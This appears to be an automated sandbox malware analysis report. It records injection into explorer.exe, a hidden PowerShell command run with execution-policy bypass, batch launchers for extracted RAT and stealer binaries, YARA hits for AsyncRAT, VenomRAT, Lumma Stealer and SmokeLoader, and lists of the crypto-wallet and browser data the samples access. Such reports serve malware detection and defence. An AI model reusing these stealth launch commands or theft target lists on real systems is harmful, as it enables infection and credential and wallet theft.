Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: C:\Windows\explorer.exe base: 81C0000
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: C:\Windows\explorer.exe base: 81C1000
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: C:\Windows\explorer.exe base: 8940030
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2DF1008

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe

Code function: 24_2_00007FF70B93F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,

24_2_00007FF70B93F310

Source: vm.exe, 00000025.00000002.3743090864.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445337555.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: SciTE.exe.5.dr	Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: vm.exe, 00000025.00000002.3743090864.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`,
Source: explorer.exe, 0000000E.00000000.1443804807.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002B06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe
Source: vm.exe, 00000025.00000002.3743090864.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\

Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\753F.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\753F.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Code function: 5_2_00BA1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

5_2_00BA1718

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Code function: 5_2_00BA139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

5_2_00BA139F

Source: C:\Users\user\AppData\Local\Temp\753F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR

Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: vm.exe, 00000025.00000003.3562615440.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3445377464.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3553795958.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3435304768.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3755459555.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3313681579.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3672819972.0000000005668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: procexp.exe
Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: IXDaI.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IXDaI.exe PID: 7708, type: MEMORYSTR

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 27.0.B552.exe.7ff75ee70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B552.exe.7ff75ee70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B552.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\B552.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets~)W%
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: BitLockerToGo.exe, 0000001F.00000003.2427860356.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletAU.$
Source: BitLockerToGo.exe, 0000001F.00000003.2427693258.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\BinanceZy
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 0000001F.00000003.2427860356.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 753F.exe, 0000001C.00000002.2846157779.00007FF7C0B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
